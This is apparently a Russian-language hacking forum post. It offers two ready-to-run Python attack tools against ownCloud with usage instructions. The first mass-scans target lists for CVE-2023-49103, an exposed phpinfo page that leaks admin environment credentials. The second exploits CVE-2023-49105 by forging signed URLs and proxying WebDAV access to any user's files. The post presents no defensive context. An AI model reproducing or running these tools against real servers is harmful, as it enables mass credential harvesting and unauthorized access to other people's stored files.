- Регистрация
- 20.01.2011
- Сообщения
- 7,665
- Розыгрыши
- 0
- Реакции
- 135
Чекер на CVE-2023-49103
Python:
#Установить зависимости pip install requests urllib3 colorama alive-progress
#Использование python exploit.py -t input_file.txt -o output_file.txt
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor
from colorama import Fore, Style
import argparse
import queue
from alive_progress import alive_bar
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def check_phpinfo(url):
try:
response = requests.get(url, verify=False) # Bypass SSL verification
if response.status_code == 200 and 'OWNCLOUD_ADMIN_' in response.text:
return True
except requests.RequestException:
pass
return False
def process_urls(url_queue, output_file, update_bar):
with open(output_file, 'a') as out:
while True:
url = url_queue.get()
if url is None:
url_queue.task_done()
break # Sentinel value to indicate completion
try:
if check_phpinfo(url):
print(Fore.GREEN + "Valid: " + url + Style.RESET_ALL)
out.write(url + '\n')
else:
print(Fore.RED + "Invalid: " + url + Style.RESET_ALL)
except Exception as e:
print(Fore.YELLOW + f"Error processing {url}: {e}" + Style.RESET_ALL)
finally:
url_queue.task_done()
update_bar() # Update the progress bar
def process_file(file_path, output_file):
urls = []
with open(file_path, 'r') as file:
for line in file:
base_url = line.strip()
# Append both URL variants for each base URL
urls.append(base_url + "/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
urls.append(base_url + "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css")
url_queue = queue.Queue()
num_workers = min(100, len(urls)) # Adjust based on your system's capabilities
with alive_bar(len(urls), bar='smooth', enrich_print=False) as bar:
with ThreadPoolExecutor(max_workers=num_workers) as executor:
# Start worker threads
for _ in range(num_workers):
executor.submit(process_urls, url_queue, output_file, bar)
# Read URLs and add them to the queue
for url in urls:
url_queue.put(url)
# Add sentinel values to indicate completion
for _ in range(num_workers):
url_queue.put(None)
url_queue.join() # Wait for all tasks to be completed
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Process some URLs.')
parser.add_argument('-t', '--target', required=True, help='Input file with URLs')
parser.add_argument('-o', '--output', required=True, help='Output file for valid URLs')
args = parser.parse_args()
process_file(args.target, args.output)
Скачиваем ten
Для просмотра ссылки Войди
cd ten
poetry install
Запускаем
poetry shell
Эксплоит для CVE-2023-49105
Python:
#Использование (через ten) python exploit.py http://target.com admin
import hashlib
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from ten import *
from tenlib.transform import url as turl
@entry
def main(url: str, username: str, listen: str = "localhost:8800") -> None:
# Setup ProxyHandler
ProxyHandler.session = ScopedSession(url)
# ProxyHandler.session.burp()
ProxyHandler.username = username
# Display info
msg_success(f"Proxy server running on {listen}")
dav_url = f"dav://anonymous@{listen}/remote.php/dav"
msg_info(f"Browse user files: {dav_url}/files/{username}")
msg_info(f"Browse everything: {dav_url}")
# Setup HTTP server
listen_host, listen_port = listen.split(":")
listen_port = int(listen_port)
proxy_server = ThreadingHTTPServer((listen_host, listen_port), ProxyHandler)
try:
proxy_server.serve_forever()
except KeyboardInterrupt:
msg_failure("Shutting down the proxy server.")
proxy_server.server_close()
class ProxyHandler(SimpleHTTPRequestHandler):
session = ScopedSession
username: str
def do_ANY(self):
# Fix bug where ownCloud does not realize /remote.php/dav is equal to
# /remote.php/dav/ and raises an error
if self.path == "/remote.php/dav":
self.path += "/"
# Add OC-* and signature to the URL
url = build_signed_url(
self.command, self.username, self.session.get_absolute_url(self.path)
)
# Prepare headers
headers = {header: self.headers[header] for header in self.headers}
headers["Host"] = turl.parse(url).netloc
# TODO stream input
if size := int(self.headers.get("Content-Length", 0)):
data = self.rfile.read(size)
else:
data = None
response = self.session.request(
self.command, url, headers=headers, data=data, stream=True
)
self.send_response(response.status_code)
for header, value in response.headers.items():
self.send_header(header, value)
self.end_headers()
# Stream the response content to the client
for chunk in response.iter_content(chunk_size=8192):
if chunk:
self.wfile.write(chunk)
do_OPTIONS = do_ANY
do_GET = do_ANY
do_HEAD = do_ANY
do_POST = do_ANY
do_PUT = do_ANY
do_DELETE = do_ANY
do_TRACE = do_ANY
do_COPY = do_ANY
do_LOCK = do_ANY
do_MKCOL = do_ANY
do_MOVE = do_ANY
do_PROPFIND = do_ANY
do_PROPPATCH = do_ANY
do_UNLOCK = do_ANY
def compute_hash(url: str) -> str:
url = url.encode()
signing_key = "".encode()
iterations = 10000
return hashlib.pbkdf2_hmac("sha512", url, signing_key, iterations, dklen=32).hex()
def build_signed_url(method: str, username: str, url: str) -> str:
parsed = turl.parse(url)
params = qs.parse(parsed.query)
params["OC-Credential"] = username
params["OC-Verb"] = method
params["OC-Expires"] = "1000"
params["OC-Date"] = ""
parsed = parsed._replace(query=qs.unparse(params))
params["OC-Signature"] = compute_hash(turl.unparse(parsed))
parsed = parsed._replace(query=qs.unparse(params))
return turl.unparse(parsed)
main()
Для просмотра ссылки Войди